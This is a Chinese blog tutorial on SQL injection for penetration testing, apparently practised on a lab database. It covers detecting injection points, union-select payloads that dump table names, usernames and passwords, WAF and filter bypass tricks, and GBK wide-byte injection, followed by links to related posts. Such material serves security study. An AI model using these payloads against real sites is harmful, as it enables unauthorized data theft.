渗透测试——sql注入

最新推荐文章于 2025-03-09 21:44:11 发布
最新推荐文章于 2025-03-09 21:44:11 发布
阅读量641 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yukinorong/article/details/107531408
版权
该博客详细介绍了SQL注入的判断、利用和绕过方法。首先通过单引号测试确定注入点,接着讲解如何识别数字型和字符型注入。在SQL注入利用部分,讲述了获取数据库信息和绕过策略,包括注释符号、大小写、双写关键字等方式。对于WAF过滤,提出了特殊编码、空格替代和逻辑运算符绕过等技巧。最后,讨论了宽字节注入,解释了PHP和MySQL的字符集交互如何导致漏洞,并给出了相应对策。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

判断注入点

  1. 单引号判断
    http://xxx/abc.php?id=1'
    如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。 (如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号做了过滤,这时可以使用判断语句进行注入)
    在这里插入图片描述

  2. 判断sql注入类型

    1. 数字型
      ?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。
    2. 字符型
      ?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。
      在这里插入图片描述

sql注入利用

  1. 获取数据库和版本信息
    ?id=1’ and 1=2 union select 1,@@version,database() --%20
    在这里插入图片描述
  2. 查看security数据库所包含的表
    ?id=1’ and 1=2 union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=‘security’ --%20
    在这里插入图片描述
  3. 查看相应表中的字段名
    ?id=1’ and 1=2 union select 1,group_concat(column_name),table_name from information_schema.columns where table_name=‘users’ and table_schema=‘security’ --%20
    在这里插入图片描述
  4. 直接获取相关信息
    ?id=1%27%20and%201=2%20union%20select%201,group_concat(username),group_concat(password)%20%20from%20security.users%20--%20
    在这里插入图片描述

sql注入绕过

  1. 注释符号绕过
    常用的注释符有

    --+ 注释内容
# 注释内容
/*注释内容*/
;

  2. 大小写绕过

  3. 内联注释绕过
    内联注释就是把一些特有的仅在MYSQL上的语句放在 /*!...*/ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中会执行。
    在这里插入图片描述

  4. 双写关键字绕过
    在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过。例如select变成seleselectct,在经过waf的处理之后又变成select,达到绕过的要求。

  5. 特殊编码绕过

    1. 十六进制绕过

  6. 空格过滤绕过
    一般绕过空格过滤的方法有以下几种方法来取代空格

    /**/
()
回车(url编码中的%0a)
`(tap键上面的按钮)
tap
两个空格

    在这里插入图片描述

  7. or and xor not 绕过

    and = &&
or = ||
xor = | # 异或
not = !

  8. 等号=绕过

    1. 不加通配符的like执行的效果和=一致,所以可以用来绕过。
    2. rlike:模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来
    3. regexp:MySQL中使用 REGEXP 操作符来进行正则表达式匹配
    4. 使用大小于号来绕过
    5. <> 等价于 !=, 所以在前面再加一个!结果就是等号了

  9. 过滤大小于号绕过

    1. greatest(n1, n2, n3…):返回n中的最大值
    2. least(n1,n2,n3…):返回n中的最小值
    3. strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1
    4. in关键字
    5. between a and b:范围在a-b之间

宽字节注入

php后端会对我们的输入进行转义,转义的方式通常是加上’\’,

GBK 占用两字节
ASCII占用一字节
PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。
大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。

GBK中字符是一个或者两个字节,单字节00–7F这个区间和ASCII是一样的;双字节字符的第一个字节在81-FE之间,通过这个可以判断是单字节还是双字节

在这里插入图片描述
看到提示,输入被转义为 1/’
输入:?id=1a%df%27
在这里插入图片描述

网站渗透测试sql注入攻击防护介绍
网站安全资讯
11-25 356
几年前,SQL注入在世界范围内很流行,但现在,SQL注入仍然是最流行的攻击方法之一,开发人员为此头疼。当然主要是因为注入攻击的灵活性,一个目的,多条语句,多种编写方法...
渗透测试SQL注入
weixin_43988774的博客
04-02 5859
SQL注入 SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过同的条件产生同的SQL语句 sql注入漏洞的产生需要满足 参数用户可控 - 前端传给后端的参数是用户可以控制的 参数代入数据库查询 - 传入的参数拼接到SQL语句,且带入数据库查询 sql注入漏洞的分类: 从注入点区分 数字型注入 字符型注入注入方式区分 报错注入 延时注入 堆叠注入(联合查询注入) 布尔注入(盲注) 宽字节注入 cookie
渗透测试——SQL注入实验(Sqlmap)
YT的博客
02-11 6734
实验环境 本实验中,OWASP Web服务器靶机(10.10.10.129,对外公开域名:www.dvssc.com)含有 SQL注入漏洞,在攻击机 BT5 R1 (10.10.10.128)上通过工具进行攻击。 工具:sqlmap、Firefox浏览器内置的 Tamper Data 1. 输入 www.dvssc.com (或10.10.10.129) 登录要攻击的网站,点击登录界面 2....
渗透测试&护网&网络安全---sql注入
最新发布
zhenghdmax的博客
03-09 638
SQL注入是一种网络安全漏洞,攻击者在用户输入的数据中插入恶意SQL代码,绕过应用程序的输入验证和过滤机制,执行未经授权的数据库操作。:严格验证和过滤用户输入数据,过滤敏感字符(如information_schema、into out_file、into dump_file、'、"、()等),确保只允许合法数据进入数据库。:使用特定函数(如floor()、group by()、exp()、updatexml()、extractvalue()等)触发数据库报错,通过报错信息获取数据库信息。
【渗透实战系列】| 从SQL注入渗透内网(渗透的本质就是信息搜集)
白帽阿叁的博客
09-30 964
一个 SQL 注入可以帮我们的仅仅是获取数据库表里的数据,还能让我们直接获取到目标服务器的权限,减少我们渗透的时间,本文主要围绕 SQL 注入如何进内网来写的,多说兄弟们看文章就完事了。
渗透测试——SQL注入实验②
YT的博客
02-13 1859
1. 输入目标网站网址,寻找注入点 在输入框中输入 ' 单引号 返回了错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 通过错误显示,数据...
渗透测试——SQL注入
zjdda的博客
05-19 820
sql注入原理及实战
渗透测试——sql手工注入实战 @apache+php+Mysql 正则注入
aming小老弟
07-05 98
0x01 Mysql 手工注入 1.1 联合注入 登录后复制 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from informat...
渗透测试——cookie注入
zjdda的博客
05-24 3930
1.cookie注入原理 Cookie最先是由Netscape(网景)公司提出的,Netscape官方文档中对Cookie的定义是这样的: Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。 Cookie的用途非常广泛,在网络中经常可以见到Cookie的身影。它通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站和电子商务网站中的“购物车”。 Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie
《OWASP代码审计》学习——SQL注入漏洞审计
PICACHU+++的博客
08-04 779
注入攻击允许恶意用户向应用程序添加或注入内容和命令,以修改其行为。这些类型的攻击是常见且广泛的,黑客很容易测试网站是否易受攻击,攻击者也很容易利用这些攻击。如今,它们在尚未更新的遗留应用程序中非常常见。
渗透入侵\超级SQL注入工具 SSQLInjection V1.0.zip
07-15
超级SQL注入工具 SSQLInjection V1.0
渗透测试-SQL语句
zkjsdk的博客
01-13 640
sql语法.note 1.mysql -u root -p 2.查询当前数据库用户: select user(); 3.查询当前路径: select @@basedir; 4.查询所有数据库: show databases; 5.选择一个数据库; use + 数据库名; 6.查询所有表名: show tables; 7.创建一个数据库 : create database 数据库; 8...
个人笔记-渗透测试-SQL注入
weixin_48162696的博客
05-20 1128
SQL注入原理,sql注入的数据类型,sql注入的提交方式,手工注入sqlmap,基础防御,
渗透测试SQL注入案例入门
IT教育任姐姐的博客
11-10 1349
Hello,大家好 今天给大家带来的是渗透测试SQL注入案例入门 众所周知几乎OWASP每年的Top 10安全问题中,SQL注入一直高居榜首,这也就成为了安全测试、渗透测试领域最为关注的一个点。 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序, 而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL注入的应用场景 1、对于Web应用程序而言,用户核心数据存储在数据库中,
渗透测试SQL注入基础篇
ssrf
08-03 689
一、概述 在owasp年度top 10 安全问题中,注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序, 而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地 过滤用户输入的数据,致使非法数据侵入系统。 对于Web应用程序而言,用户核心数据存储在数据库中,例如MySQLSQL Server、Oracle; 通过SQL注入攻击,可以获取、修改、删除数据库信息,并且通过提权来控制Web服务器等其他操作; SQL注入即攻击者
简单的SQL渗透
shupianbenben的博客
09-13 481
SQL注入靶场
渗透测试SQL注入(简介)
weixin_53958661的博客
12-18 3135
SQL注入简介,什么是SQL注入SQL注入的分类
渗透测试-SQL注入漏洞逻辑分析
CS_DDN的博客
05-23 253
SQL注入漏洞逻辑分析
手动探索:Web安全测试实战——SQL注入、XSS与文件上传漏洞防范
本文将深入探讨"web安全——手动测试"这一主题,主要关注以下几个关键点: 1. **安全测试与传统测试的区别**: - 目标同:传统测试侧重于发现软件的功能缺陷(bug),而安全测试更关注识别和评估潜在的安全威胁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值